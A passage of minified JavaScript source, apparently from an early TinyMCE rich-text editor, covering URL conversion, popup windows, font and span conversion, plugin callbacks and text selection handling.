i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else 